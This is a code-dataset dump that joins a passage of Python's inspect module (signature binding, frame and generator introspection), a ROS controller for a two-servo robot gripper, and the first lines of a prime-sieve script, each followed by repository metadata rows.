specs.append(formatvarkw(formatargandannotation(varkw)))
result = '(' + ', '.join(specs) + ')'
if 'return' in annotations:
result += formatreturns(formatannotation(annotations['return']))
return result
def formatargvalues(args, varargs, varkw, locals,
formatarg=str,
formatvarargs=lambda name: '*' + name,
formatvarkw=lambda name: '**' + name,
formatvalue=lambda value: '=' + repr(value)):
"""Format an argument spec from the 4 values returned by getargvalues.
The first four arguments are (args, varargs, varkw, locals). The
next four arguments are the corresponding optional formatting functions
that are called to turn names and values into strings. The ninth
argument is an optional function to format the sequence of arguments."""
def convert(name, locals=locals,
formatarg=formatarg, formatvalue=formatvalue):
return formatarg(name) + formatvalue(locals[name])
specs = []
for i in range(len(args)):
specs.append(convert(args[i]))
if varargs:
specs.append(formatvarargs(varargs) + formatvalue(locals[varargs]))
if varkw:
specs.append(formatvarkw(varkw) + formatvalue(locals[varkw]))
return '(' + ', '.join(specs) + ')'
def _missing_arguments(f_name, argnames, pos, values):
names = [repr(name) for name in argnames if name not in values]
missing = len(names)
if missing == 1:
s = names[0]
elif missing == 2:
s = "{} and {}".format(*names)
else:
tail = ", {} and {}".format(names[-2:])
del names[-2:]
s = ", ".join(names) + tail
raise TypeError("%s() missing %i required %s argument%s: %s" %
(f_name, missing,
"positional" if pos else "keyword-only",
"" if missing == 1 else "s", s))
def _too_many(f_name, args, kwonly, varargs, defcount, given, values):
atleast = len(args) - defcount
kwonly_given = len([arg for arg in kwonly if arg in values])
if varargs:
plural = atleast != 1
sig = "at least %d" % (atleast,)
elif defcount:
plural = True
sig = "from %d to %d" % (atleast, len(args))
else:
plural = len(args) != 1
sig = str(len(args))
kwonly_sig = ""
if kwonly_given:
msg = " positional argument%s (and %d keyword-only argument%s)"
kwonly_sig = (msg % ("s" if given != 1 else "", kwonly_given,
"s" if kwonly_given != 1 else ""))
raise TypeError("%s() takes %s positional argument%s but %d%s %s given" %
(f_name, sig, "s" if plural else "", given, kwonly_sig,
"was" if given == 1 and not kwonly_given else "were"))
def getcallargs(func, *positional, **named):
"""Get the mapping of arguments to values.
A dict is returned, with keys the function argument names (including the
names of the * and ** arguments, if any), and values the respective bound
values from 'positional' and 'named'."""
spec = getfullargspec(func)
args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, ann = spec
f_name = func.__name__
arg2value = {}
if ismethod(func) and func.__self__ is not None:
# implicit 'self' (or 'cls' for classmethods) argument
positional = (func.__self__,) + positional
num_pos = len(positional)
num_args = len(args)
num_defaults = len(defaults) if defaults else 0
n = min(num_pos, num_args)
for i in range(n):
arg2value[args[i]] = positional[i]
if varargs:
arg2value[varargs] = tuple(positional[n:])
possible_kwargs = set(args + kwonlyargs)
if varkw:
arg2value[varkw] = {}
for kw, value in named.items():
if kw not in possible_kwargs:
if not varkw:
raise TypeError("%s() got an unexpected keyword argument %r" %
(f_name, kw))
arg2value[varkw][kw] = value
continue
if kw in arg2value:
raise TypeError("%s() got multiple values for argument %r" %
(f_name, kw))
arg2value[kw] = value
if num_pos > num_args and not varargs:
_too_many(f_name, args, kwonlyargs, varargs, num_defaults,
num_pos, arg2value)
if num_pos < num_args:
req = args[:num_args - num_defaults]
for arg in req:
if arg not in arg2value:
_missing_arguments(f_name, req, True, arg2value)
for i, arg in enumerate(args[num_args - num_defaults:]):
if arg not in arg2value:
arg2value[arg] = defaults[i]
missing = 0
for kwarg in kwonlyargs:
if kwarg not in arg2value:
if kwarg in kwonlydefaults:
arg2value[kwarg] = kwonlydefaults[kwarg]
else:
missing += 1
if missing:
_missing_arguments(f_name, kwonlyargs, False, arg2value)
return arg2value
ClosureVars = namedtuple('ClosureVars', 'nonlocals globals builtins unbound')
def getclosurevars(func):
"""
Get the mapping of free variables to their current values.
Returns a named tuple of dicts mapping the current nonlocal, global
and builtin references as seen by the body of the function. A final
set of unbound names that could not be resolved is also provided.
"""
if ismethod(func):
func = func.__func__
if not isfunction(func):
raise TypeError("'{!r}' is not a Python function".format(func))
code = func.__code__
# Nonlocal references are named in co_freevars and resolved
# by looking them up in __closure__ by positional index
if func.__closure__ is None:
nonlocal_vars = {}
else:
nonlocal_vars = {
var : cell.cell_contents
for var, cell in zip(code.co_freevars, func.__closure__)
}
# Global and builtin references are named in co_names and resolved
# by looking them up in __globals__ or __builtins__
global_ns = func.__globals__
builtin_ns = global_ns.get("__builtins__", builtins.__dict__)
if ismodule(builtin_ns):
builtin_ns = builtin_ns.__dict__
global_vars = {}
builtin_vars = {}
unbound_names = set()
for name in code.co_names:
if name in ("None", "True", "False"):
# Because these used to be builtins instead of keywords, they
# may still show up as name references. We ignore them.
continue
try:
global_vars[name] = global_ns[name]
except KeyError:
try:
builtin_vars[name] = builtin_ns[name]
except KeyError:
unbound_names.add(name)
return ClosureVars(nonlocal_vars, global_vars,
builtin_vars, unbound_names)
# -------------------------------------------------- stack frame extraction
Traceback = namedtuple('Traceback', 'filename lineno function code_context index')
def getframeinfo(frame, context=1):
"""Get information about a frame or traceback object.
A tuple of five things is returned: the filename, the line number of
the current line, the function name, a list of lines of context from
the source code, and the index of the current line within that list.
The optional second argument specifies the number of lines of context
to return, which are centered around the current line."""
if istraceback(frame):
lineno = frame.tb_lineno
frame = frame.tb_frame
else:
lineno = frame.f_lineno
if not isframe(frame):
raise TypeError('{!r} is not a frame or traceback object'.format(frame))
filename = getsourcefile(frame) or getfile(frame)
if context > 0:
start = lineno - 1 - context//2
try:
lines, lnum = findsource(frame)
except IOError:
lines = index = None
else:
start = max(start, 1)
start = max(0, min(start, len(lines) - context))
lines = lines[start:start+context]
index = lineno - 1 - start
else:
lines = index = None
return Traceback(filename, lineno, frame.f_code.co_name, lines, index)
def getlineno(frame):
"""Get the line number from a frame object, allowing for optimization."""
# FrameType.f_lineno is now a descriptor that grovels co_lnotab
return frame.f_lineno
def getouterframes(frame, context=1):
"""Get a list of records for a frame and all higher (calling) frames.
Each record contains a frame object, filename, line number, function
name, a list of lines of context, and index within the context."""
framelist = []
while frame:
framelist.append((frame,) + getframeinfo(frame, context))
frame = frame.f_back
return framelist
def getinnerframes(tb, context=1):
"""Get a list of records for a traceback's frame and all lower frames.
Each record contains a frame object, filename, line number, function
name, a list of lines of context, and index within the context."""
framelist = []
while tb:
framelist.append((tb.tb_frame,) + getframeinfo(tb, context))
tb = tb.tb_next
return framelist
def currentframe():
"""Return the frame of the caller or None if this is not possible."""
return sys._getframe(1) if hasattr(sys, "_getframe") else None
def stack(context=1):
"""Return a list of records for the stack above the caller's frame."""
return getouterframes(sys._getframe(1), context)
def trace(context=1):
"""Return a list of records for the stack below the current exception."""
return getinnerframes(sys.exc_info()[2], context)
# ------------------------------------------------ static version of getattr
_sentinel = object()
def _static_getmro(klass):
return type.__dict__['__mro__'].__get__(klass)
def _check_instance(obj, attr):
instance_dict = {}
try:
instance_dict = object.__getattribute__(obj, "__dict__")
except AttributeError:
pass
return dict.get(instance_dict, attr, _sentinel)
def _check_class(klass, attr):
for entry in _static_getmro(klass):
if _shadowed_dict(type(entry)) is _sentinel:
try:
return entry.__dict__[attr]
except KeyError:
pass
return _sentinel
def _is_type(obj):
try:
_static_getmro(obj)
except TypeError:
return False
return True
def _shadowed_dict(klass):
dict_attr = type.__dict__["__dict__"]
for entry in _static_getmro(klass):
try:
class_dict = dict_attr.__get__(entry)["__dict__"]
except KeyError:
pass
else:
if not (type(class_dict) is types.GetSetDescriptorType and
class_dict.__name__ == "__dict__" and
class_dict.__objclass__ is entry):
return class_dict
return _sentinel
def getattr_static(obj, attr, default=_sentinel):
"""Retrieve attributes without triggering dynamic lookup via the
descriptor protocol, __getattr__ or __getattribute__.
Note: this function may not be able to retrieve all attributes
that getattr can fetch (like dynamically created attributes)
and may find attributes that getattr can't (like descriptors
that raise AttributeError). It can also return descriptor objects
instead of instance members in some cases. See the
documentation for details.
"""
instance_result = _sentinel
if not _is_type(obj):
klass = type(obj)
dict_attr = _shadowed_dict(klass)
if (dict_attr is _sentinel or
type(dict_attr) is types.MemberDescriptorType):
instance_result = _check_instance(obj, attr)
else:
klass = obj
klass_result = _check_class(klass, attr)
if instance_result is not _sentinel and klass_result is not _sentinel:
if (_check_class(type(klass_result), '__get__') is not _sentinel and
_check_class(type(klass_result), '__set__') is not _sentinel):
return klass_result
if instance_result is not _sentinel:
return instance_result
if klass_result is not _sentinel:
return klass_result
if obj is klass:
# for types we check the metaclass too
for entry in _static_getmro(type(klass)):
if _shadowed_dict(type(entry)) is _sentinel:
try:
return entry.__dict__[attr]
except KeyError:
pass
if default is not _sentinel:
return default
raise AttributeError(attr)
# ------------------------------------------------ generator introspection
GEN_CREATED = 'GEN_CREATED'
GEN_RUNNING = 'GEN_RUNNING'
GEN_SUSPENDED = 'GEN_SUSPENDED'
GEN_CLOSED = 'GEN_CLOSED'
def getgeneratorstate(generator):
"""Get current state of a generator-iterator.
Possible states are:
GEN_CREATED: Waiting to start execution.
GEN_RUNNING: Currently being executed by the interpreter.
GEN_SUSPENDED: Currently suspended at a yield expression.
GEN_CLOSED: Execution has completed.
"""
if generator.gi_running:
return GEN_RUNNING
if generator.gi_frame is None:
return GEN_CLOSED
if generator.gi_frame.f_lasti == -1:
return GEN_CREATED
return GEN_SUSPENDED
def getgeneratorlocals(generator):
"""
Get the mapping of generator local variables to their current values.
A dict is returned, with the keys the local variable names and values the
bound values."""
if not isgenerator(generator):
raise TypeError("'{!r}' is not a Python generator".format(generator))
frame = getattr(generator, "gi_frame", None)
if frame is not None:
return generator.gi_frame.f_locals
else:
return {}
###############################################################################
### Function Signature Object (PEP 362)
###############################################################################
_WrapperDescriptor = type(type.__call__)
_MethodWrapper = type(all.__call__)
_NonUserDefinedCallables = (_WrapperDescriptor,
_MethodWrapper,
types.BuiltinFunctionType)
def _get_user_defined_method(cls, method_name):
try:
meth = getattr(cls, method_name)
except AttributeError:
return
else:
if not isinstance(meth, _NonUserDefinedCallables):
# Once '__signature__' will be added to 'C'-level
# callables, this check won't be necessary
return meth
def signature(obj):
'''Get a signature object for the passed callable.'''
if not callable(obj):
raise TypeError('{!r} is not a callable object'.format(obj))
if isinstance(obj, types.MethodType):
# In this case we skip the first parameter of the underlying
# function (usually `self` or `cls`).
sig = signature(obj.__func__)
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
try:
sig = obj.__signature__
except AttributeError:
pass
else:
if sig is not None:
return sig
try:
# Was this function wrapped by a decorator?
wrapped = obj.__wrapped__
except AttributeError:
pass
else:
return signature(wrapped)
if isinstance(obj, types.FunctionType):
return Signature.from_function(obj)
if isinstance(obj, functools.partial):
sig = signature(obj.func)
new_params = OrderedDict(sig.parameters.items())
partial_args = obj.args or ()
partial_keywords = obj.keywords or {}
try:
ba = sig.bind_partial(*partial_args, **partial_keywords)
except TypeError as ex:
msg = 'partial object {!r} has incorrect arguments'.format(obj)
raise ValueError(msg) from ex
for arg_name, arg_value in ba.arguments.items():
param = new_params[arg_name]
if arg_name in partial_keywords:
# We set a new default value, because the following code
# is correct:
#
# >>> def foo(a): print(a)
# >>> print(partial(partial(foo, a=10), a=20)())
# 20
# >>> print(partial(partial(foo, a=10), a=20)(a=30))
# 30
#
# So, with 'partial' objects, passing a keyword argument is
# like setting a new default value for the corresponding
# parameter
#
# We also mark this parameter with '_partial_kwarg'
# flag. Later, in '_bind', the 'default' value of this
# parameter will be added to 'kwargs', to simulate
# the 'functools.partial' real call.
new_params[arg_name] = param.replace(default=arg_value,
_partial_kwarg=True)
elif (param.kind not in (_VAR_KEYWORD, _VAR_POSITIONAL) and
not param._partial_kwarg):
new_params.pop(arg_name)
return sig.replace(parameters=new_params.values())
sig = None
if isinstance(obj, type):
# obj is a class or a metaclass
# First, let's see if it has an overloaded __call__ defined
# in its metaclass
call = _get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = signature(call)
else:
# Now we check if the 'obj' class has a '__new__' method
new = _get_user_defined_method(obj, '__new__')
if new is not None:
sig = signature(new)
else:
# Finally, we should have at least __init__ implemented
init = _get_user_defined_method(obj, '__init__')
if init is not None:
sig = signature(init)
elif not isinstance(obj, _NonUserDefinedCallables):
# An object with __call__
# We also check that the 'obj' is not an instance of
# _WrapperDescriptor or _MethodWrapper to avoid
# infinite recursion (and even potential segfault)
call = _get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = signature(call)
if sig is not None:
# For classes and objects we skip the first parameter of their
# __call__, __new__, or __init__ methods
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
if isinstance(obj, types.BuiltinFunctionType):
# Raise a nicer error message for builtins
msg = 'no signature found for builtin function {!r}'.format(obj)
raise ValueError(msg)
raise ValueError('callable {!r} is not supported by signature'.format(obj))
class _void:
'''A private marker - used in Parameter & Signature'''
class _empty:
pass
class _ParameterKind(int):
def __new__(self, *args, name):
obj = int.__new__(self, *args)
obj._name = name
return obj
def __str__(self):
return self._name
def __repr__(self):
return '<_ParameterKind: {!r}>'.format(self._name)
_POSITIONAL_ONLY = _ParameterKind(0, name='POSITIONAL_ONLY')
_POSITIONAL_OR_KEYWORD = _ParameterKind(1, name='POSITIONAL_OR_KEYWORD')
_VAR_POSITIONAL = _ParameterKind(2, name='VAR_POSITIONAL')
_KEYWORD_ONLY = _ParameterKind(3, name='KEYWORD_ONLY')
_VAR_KEYWORD = _ParameterKind(4, name='VAR_KEYWORD')
class Parameter:
'''Represents a parameter in a function signature.
Has the following public attributes:
* name : str
The name of the parameter as a string.
* default : object
The default value for the parameter if specified. If the
parameter has no default value, this attribute is not set.
* annotation
The annotation for the parameter if specified. If the
parameter has no annotation, this attribute is not set.
* kind : str
Describes how argument values are bound to the parameter.
Possible values: `Parameter.POSITIONAL_ONLY`,
`Parameter.POSITIONAL_OR_KEYWORD`, `Parameter.VAR_POSITIONAL`,
`Parameter.KEYWORD_ONLY`, `Parameter.VAR_KEYWORD`.
'''
__slots__ = ('_name', '_kind', '_default', '_annotation', '_partial_kwarg')
POSITIONAL_ONLY = _POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = _POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = _VAR_POSITIONAL
KEYWORD_ONLY = _KEYWORD_ONLY
VAR_KEYWORD = _VAR_KEYWORD
empty = _empty
def __init__(self, name, kind, *, default=_empty, annotation=_empty,
_partial_kwarg=False):
if kind not in (_POSITIONAL_ONLY, _POSITIONAL_OR_KEYWORD,
_VAR_POSITIONAL, _KEYWORD_ONLY, _VAR_KEYWORD):
raise ValueError("invalid value for 'Parameter.kind' attribute")
self._kind = kind
if default is not _empty:
if kind in (_VAR_POSITIONAL, _VAR_KEYWORD):
msg = '{} parameters cannot have default values'.format(kind)
raise ValueError(msg)
self._default = default
self._annotation = annotation
if name is None:
if kind != _POSITIONAL_ONLY:
raise ValueError("None is not a valid name for a "
"non-positional-only parameter")
self._name = name
else:
name = str(name)
if kind != _POSITIONAL_ONLY and not name.isidentifier():
msg = '{!r} is not a valid parameter name'.format(name)
raise ValueError(msg)
self._name = name
self._partial_kwarg = _partial_kwarg
@property
def name(self):
return self._name
@property
def default(self):
return self._default
@property
def annotation(self):
return self._annotation
@property
def kind(self):
return self._kind
def replace(self, *, name=_void, kind=_void, annotation=_void,
default=_void, _partial_kwarg=_void):
'''Creates a customized copy of the Parameter.'''
if name is _void:
name = self._name
if kind is _void:
kind = self._kind
if annotation is _void:
annotation = self._annotation
if default is _void:
default = self._default
if _partial_kwarg is _void:
_partial_kwarg = self._partial_kwarg
return type(self)(name, kind, default=default, annotation=annotation,
_partial_kwarg=_partial_kwarg)
def __str__(self):
kind = self.kind
formatted = self._name
if kind == _POSITIONAL_ONLY:
if formatted is None:
formatted = ''
formatted = '<{}>'.format(formatted)
# Add annotation and default value
if self._annotation is not _empty:
formatted = '{}:{}'.format(formatted,
formatannotation(self._annotation))
if self._default is not _empty:
formatted = '{}={}'.format(formatted, repr(self._default))
if kind == _VAR_POSITIONAL:
formatted = '*' + formatted
elif kind == _VAR_KEYWORD:
formatted = '**' + formatted
return formatted
def __repr__(self):
return '<{} at {:#x} {!r}>'.format(self.__class__.__name__,
id(self), self.name)
def __eq__(self, other):
return (issubclass(other.__class__, Parameter) and
self._name == other._name and
self._kind == other._kind and
self._default == other._default and
self._annotation == other._annotation)
def __ne__(self, other):
return not self.__eq__(other)
class BoundArguments:
'''Result of `Signature.bind` call. Holds the mapping of arguments
to the function's parameters.
Has the following public attributes:
* arguments : OrderedDict
An ordered mutable mapping of parameters' names to arguments' values.
Does not contain arguments' default values.
* signature : Signature
The Signature object that created this instance.
* args : tuple
Tuple of positional arguments values.
* kwargs : dict
Dict of keyword arguments values.
'''
def __init__(self, signature, arguments):
self.arguments = arguments
self._signature = signature
@property
def signature(self):
return self._signature
@property
def args(self):
args = []
for param_name, param in self._signature.parameters.items():
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
# Keyword arguments mapped by 'functools.partial'
# (Parameter._partial_kwarg is True) are mapped
# in 'BoundArguments.kwargs', along with VAR_KEYWORD &
# KEYWORD_ONLY
break
try:
arg = self.arguments[param_name]
except KeyError:
# We're done here. Other arguments
# will be mapped in 'BoundArguments.kwargs'
break
else:
if param.kind == _VAR_POSITIONAL:
# *args
args.extend(arg)
else:
# plain argument
args.append(arg)
return tuple(args)
@property
def kwargs(self):
kwargs = {}
kwargs_started = False
for param_name, param in self._signature.parameters.items():
if not kwargs_started:
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
kwargs_started = True
else:
if param_name not in self.arguments:
kwargs_started = True
continue
if not kwargs_started:
continue
try:
arg = self.arguments[param_name]
except KeyError:
pass
else:
if param.kind == _VAR_KEYWORD:
# **kwargs
kwargs.update(arg)
else:
# plain keyword argument
kwargs[param_name] = arg
return kwargs
def __eq__(self, other):
return (issubclass(other.__class__, BoundArguments) and
self.signature == other.signature and
self.arguments == other.arguments)
def __ne__(self, other):
return not self.__eq__(other)
class Signature:
'''A Signature object represents the overall signature of a function.
It stores a Parameter object for each parameter accepted by the
function, as well as information specific to the function itself.
A Signature object has the following public attributes and methods:
* parameters : OrderedDict
An ordered mapping of parameters' names to the corresponding
Parameter objects (keyword-only arguments are in the same order
as listed in `code.co_varnames`).
* return_annotation : object
The annotation for the return type of the function if specified.
If the function has no annotation for its return type, this
attribute is not set.
* bind(*args, **kwargs) -> BoundArguments
Creates a mapping from positional and keyword arguments to
parameters.
* bind_partial(*args, **kwargs) -> BoundArguments
Creates a partial mapping from positional and keyword arguments
to parameters (simulating 'functools.partial' behavior.)
'''
__slots__ = ('_return_annotation', '_parameters')
_parameter_cls = Parameter
_bound_arguments_cls = BoundArguments
empty = _empty
def __init__(self, parameters=None, *, return_annotation=_empty,
__validate_parameters__=True):
'''Constructs Signature from the given list of Parameter
objects and 'return_annotation'. All arguments are optional.
'''
if parameters is None:
params = OrderedDict()
else:
if __validate_parameters__:
params = OrderedDict()
top_kind = _POSITIONAL_ONLY
for idx, param in enumerate(parameters):
kind = param.kind
if kind < top_kind:
msg = 'wrong parameter order: {} before {}'
msg = msg.format(top_kind, param.kind)
raise ValueError(msg)
else:
top_kind = kind
name = param.name
if name is None:
name = str(idx)
param = param.replace(name=name)
if name in params:
msg = 'duplicate parameter name: {!r}'.format(name)
raise ValueError(msg)
params[name] = param
else:
params = OrderedDict(((param.name, param)
for param in parameters))
self._parameters = types.MappingProxyType(params)
self._return_annotation = return_annotation
@classmethod
def from_function(cls, func):
'''Constructs Signature for the given python function'''
if not isinstance(func, types.FunctionType):
raise TypeError('{!r} is not a Python function'.format(func))
Parameter = cls._parameter_cls
# Parameter information.
func_code = func.__code__
pos_count = func_code.co_argcount
arg_names = func_code.co_varnames
positional = tuple(arg_names[:pos_count])
keyword_only_count = func_code.co_kwonlyargcount
keyword_only = arg_names[pos_count:(pos_count + keyword_only_count)]
annotations = func.__annotations__
defaults = func.__defaults__
kwdefaults = func.__kwdefaults__
if defaults:
pos_default_count = len(defaults)
else:
pos_default_count = 0
parameters = []
# Non-keyword-only parameters w/o defaults.
non_default_count = pos_count - pos_default_count
for name in positional[:non_default_count]:
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD))
# ... w/ defaults.
for offset, name in enumerate(positional[non_default_count:]):
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD,
default=defaults[offset]))
# *args
if func_code.co_flags & 0x04:
name = arg_names[pos_count + keyword_only_count]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_POSITIONAL))
# Keyword-only parameters.
for name in keyword_only:
default = _empty
if kwdefaults is not None:
default = kwdefaults.get(name, _empty)
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_KEYWORD_ONLY,
default=default))
# **kwargs
if func_code.co_flags & 0x08:
index = pos_count + keyword_only_count
if func_code.co_flags & 0x04:
index += 1
name = arg_names[index]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_KEYWORD))
return cls(parameters,
return_annotation=annotations.get('return', _empty),
__validate_parameters__=False)
@property
def parameters(self):
return self._parameters
@property
def return_annotation(self):
return self._return_annotation
def replace(self, *, parameters=_void, return_annotation=_void):
'''Creates a customized copy of the Signature.
Pass 'parameters' and/or 'return_annotation' arguments
to override them in the new copy.
'''
if parameters is _void:
parameters = self.parameters.values()
if return_annotation is _void:
return_annotation = self._return_annotation
return type(self)(parameters,
return_annotation=return_annotation)
def __eq__(self, other):
if (not issubclass(type(other), Signature) or
self.return_annotation != other.return_annotation or
len(self.parameters) != len(other.parameters)):
return False
other_positions = {param: idx
for idx, param in enumerate(other.parameters.keys())}
for idx, (param_name, param) in enumerate(self.parameters.items()):
if param.kind == _KEYWORD_ONLY:
try:
other_param = other.parameters[param_name]
except KeyError:
return False
else:
if param != other_param:
return False
else:
try:
other_idx = other_positions[param_name]
except KeyError:
return False
else:
if (idx != other_idx or
param != other.parameters[param_name]):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def _bind(self, args, kwargs, *, partial=False):
'''Private method. Don't use directly.'''
arguments = OrderedDict()
parameters = iter(self.parameters.values())
parameters_ex = ()
arg_vals = iter(args)
if partial:
# Support for binding arguments to 'functools.partial' objects.
# See 'functools.partial' case in 'signature()' implementation
# for details.
for param_name, param in self.parameters.items():
if (param._partial_kwarg and param_name not in kwargs):
# Simulating 'functools.partial' behavior
kwargs[param_name] = param.default
while True:
# Let's iterate through the positional arguments and corresponding
# parameters
try:
arg_val = next(arg_vals)
except StopIteration:
# No more positional arguments
try:
param = next(parameters)
except StopIteration:
# No more parameters. That's it. Just need to check that
# we have no `kwargs` after this while loop
break
else:
if param.kind == _VAR_POSITIONAL:
# That's OK, just empty *args. Let's start parsing
# kwargs
break
elif param.name in kwargs:
if param.kind == _POSITIONAL_ONLY:
msg = '{arg!r} parameter is positional only, ' \
'but was passed as a keyword'
msg = msg.format(arg=param.name)
raise TypeError(msg) from None
parameters_ex = (param,)
break
elif (param.kind == _VAR_KEYWORD or
param.default is not _empty):
# That's fine too - we have a default value for this
# parameter. So, lets start parsing `kwargs`, starting
# with the current parameter
parameters_ex = (param,)
break
else:
if partial:
parameters_ex = (param,)
break
else:
msg = '{arg!r} parameter lacking default value'
msg = msg.format(arg=param.name)
raise TypeError(msg) from None
else:
# We have a positional argument to process
try:
param = next(parameters)
except StopIteration:
raise TypeError('too many positional arguments') from None
else:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
# Looks like we have no parameter for this positional
# argument
raise TypeError('too many positional arguments')
if param.kind == _VAR_POSITIONAL:
# We have an '*args'-like argument, let's fill it with
# all positional arguments we have left and move on to
# the next phase
values = [arg_val]
values.extend(arg_vals)
arguments[param.name] = tuple(values)
break
if param.name in kwargs:
raise TypeError('multiple values for argument '
'{arg!r}'.format(arg=param.name))
arguments[param.name] = arg_val
# Now, we iterate through the remaining parameters to process
# keyword arguments
kwargs_param = None
for param in itertools.chain(parameters_ex, parameters):
if param.kind == _POSITIONAL_ONLY:
# This should never happen in case of a properly built
# Signature object (but let's have this check here
# to ensure correct behaviour just in case)
raise TypeError('{arg!r} parameter is positional only, '
'but was passed as a keyword'. \
format(arg=param.name))
if param.kind == _VAR_KEYWORD:
# Memorize that we have a '**kwargs'-like parameter
kwargs_param = param
continue
param_name = param.name
try:
arg_val = kwargs.pop(param_name)
except KeyError:
# We have no value for this parameter. It's fine though,
# if it has a default value, or it is an '*args'-like
# parameter, left alone by the processing of positional
# arguments.
if (not partial and param.kind != _VAR_POSITIONAL and
param.default is _empty):
raise TypeError('{arg!r} parameter lacking default value'. \
format(arg=param_name)) from None
else:
arguments[param_name] = arg_val
if kwargs:
if kwargs_param is not None:
# Process our '**kwargs'-like parameter
arguments[kwargs_param.name] = kwargs
else:
raise TypeError('too many keyword arguments')
return self._bound_arguments_cls(self, arguments)
def bind(__bind_self, *args, **kwargs):
'''Get a BoundArguments object, that maps the passed `args`
and `kwargs` to the function's signature. Raises `TypeError`
if the passed arguments can not be bound.
'''
return __bind_self._bind(args, kwargs)
def bind_partial(__bind_self, *args, **kwargs):
'''Get a BoundArguments object, that partially maps the
passed `args` and `kwargs` to the function's signature.
Raises `TypeError` if the passed arguments can not be bound.
'''
return __bind_self._bind(args, kwargs, partial=True)
def __str__(self):
result = []
render_kw_only_separator = True
for idx, param in enumerate(self.parameters.values()):
formatted = str(param)
kind = param.kind
if kind == _VAR_POSITIONAL:
# OK, we have an '*args'-like parameter, so we won't need
# a '*' to separate keyword-only arguments
render_kw_only_separator = False
elif kind == _KEYWORD_ONLY and render_kw_only_separator:
# We have a keyword-only parameter to render and we haven't
# rendered an '*args'-like parameter before, so add a '*'
# separator to the parameters list ("foo(arg1, *, arg2)" case)
result.append('*')
# This condition should be only triggered once, so
# reset the flag
render_kw_only_separator = False
result.append(formatted)
rendered = '({})'.format(', '.join(result))
if self.return_annotation is not _empty:
anno = formatannotation(self.return_annotation)
rendered += ' -> {}'.format(anno)
return rendered
| gpl-2.0 | -3,654,882,928,471,189,500 | 37.033751 | 84 | 0.588411 | false | 4.555703 | false | false | false |
gtagency/roscorobot | Corobot/corobot_arm/nodes/parallel_gripper_controller.py | 1 | 3967 | #!/usr/bin/env python
"""
parallel_gripper_controller.py - controls a gripper built of two servos
Copyright (c) 2011 Vanadium Labs LLC. All right reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Vanadium Labs LLC nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL VANADIUM LABS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import roslib; roslib.load_manifest('arbotix_controllers')
import rospy
import thread
from std_msgs.msg import Float64
from math import asin
class ParallelGripperController:
""" A simple controller that operates two opposing servos to
open/close to a particular size opening. """
def __init__(self):
rospy.init_node("parallel_gripper_controller")
# trapezoid model: base width connecting each gripper's rotation point
# + length of gripper fingers to computation point
# = compute angles based on a desired width at comp. point
self.pad_width = rospy.get_param("~pad_width", 0.01)
self.finger_length = rospy.get_param("~finger_length", 0.02)
self.min_opening = rospy.get_param("~min", 0.0)
self.max_opening = rospy.get_param("~max", 2*self.finger_length)
self.center_l = rospy.get_param("~center_left", 0.0)
self.center_r = rospy.get_param("~center_right", 0.0)
self.invert_l = rospy.get_param("~invert_left", False)
self.invert_r = rospy.get_param("~invert_right", False)
# publishers
self.l_pub = rospy.Publisher("l_gripper_joint/command", Float64)
self.r_pub = rospy.Publisher("r_gripper_joint/command", Float64)
# subscribe to command and then spin
rospy.Subscriber("~command", Float64, self.commandCb)
rospy.spin()
def commandCb(self, msg):
""" Take an input command of width to open gripper. """
# check limits
if msg.data > self.max_opening or msg.data < self.min_opening:
rospy.logerr("Command exceeds limits.")
return
# compute angles
angle = asin((msg.data - self.pad_width)/(2*self.finger_length))
if self.invert_l:
l = -angle + self.center_l
else:
l = angle + self.center_l
if self.invert_r:
r = angle + self.center_r
else:
r = -angle + self.center_r
# publish msgs
lmsg = Float64(l)
rmsg = Float64(r)
self.l_pub.publish(lmsg)
self.r_pub.publish(rmsg)
if __name__=="__main__":
try:
ParallelGripperController()
except rospy.ROSInterruptException:
rospy.loginfo("Hasta la Vista...")
| gpl-2.0 | 5,491,262,526,570,646,000 | 42.593407 | 83 | 0.670028 | false | 4.106625 | false | false | false |
JaDogg/__py_playground | reference/sketchbook/misc/primesieve.py | 1 | 1135 | # Let's try rendering the outline from
# http://en.literateprograms.org/Sieve_of_Eratosthenes_(Haskell)#Putting_it_together
